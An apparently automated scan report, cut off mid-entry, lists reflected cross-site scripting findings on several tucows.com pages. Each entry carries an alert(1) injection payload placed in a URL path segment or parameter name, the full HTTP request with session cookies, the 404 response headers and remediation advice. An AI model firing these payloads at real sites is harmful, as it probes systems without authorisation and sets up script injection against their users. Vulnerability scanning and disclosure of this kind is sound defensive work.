<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0054"-alert(1)-"f4d5b36deb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesa0054"-alert(1)-"f4d5b36deb7/newassets/privacy.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:47 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40ac"-alert(1)-"9549b461301 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsa40ac"-alert(1)-"9549b461301/privacy.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb32"-alert(1)-"50d4670b506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/privacy.htmlfeb32"-alert(1)-"50d4670b506 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.323. http://www.tucows.com/images/newassets/privacy.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/privacy.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1a3a"-alert(1)-"4dfa8e6d415 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/privacy.html?b1a3a"-alert(1)-"4dfa8e6d415=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:28 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60f39"-alert(1)-"f5b143ebb35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images60f39"-alert(1)-"f5b143ebb35/newassets/safesearchtoggle.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ffc5"-alert(1)-"d8706d26674 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets7ffc5"-alert(1)-"d8706d26674/safesearchtoggle.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e60fe"-alert(1)-"be3796b76d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/safesearchtoggle.htmle60fe"-alert(1)-"be3796b76d HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.327. http://www.tucows.com/images/newassets/safesearchtoggle.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/safesearchtoggle.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3b77"-alert(1)-"99a3ca1e499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/safesearchtoggle.html?d3b77"-alert(1)-"99a3ca1e499=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7005"-alert(1)-"da1cff69e08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesa7005"-alert(1)-"da1cff69e08/newassets/search.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6080c"-alert(1)-"416c9945040 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets6080c"-alert(1)-"416c9945040/search.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86474"-alert(1)-"fc2d258ee4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/search.html86474"-alert(1)-"fc2d258ee4e HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.331. http://www.tucows.com/images/newassets/search.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/search.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e494d"-alert(1)-"4b77aa9c219 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/search.html?e494d"-alert(1)-"4b77aa9c219=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af8d9"-alert(1)-"92a1570dd92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesaf8d9"-alert(1)-"92a1570dd92/newassets/sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
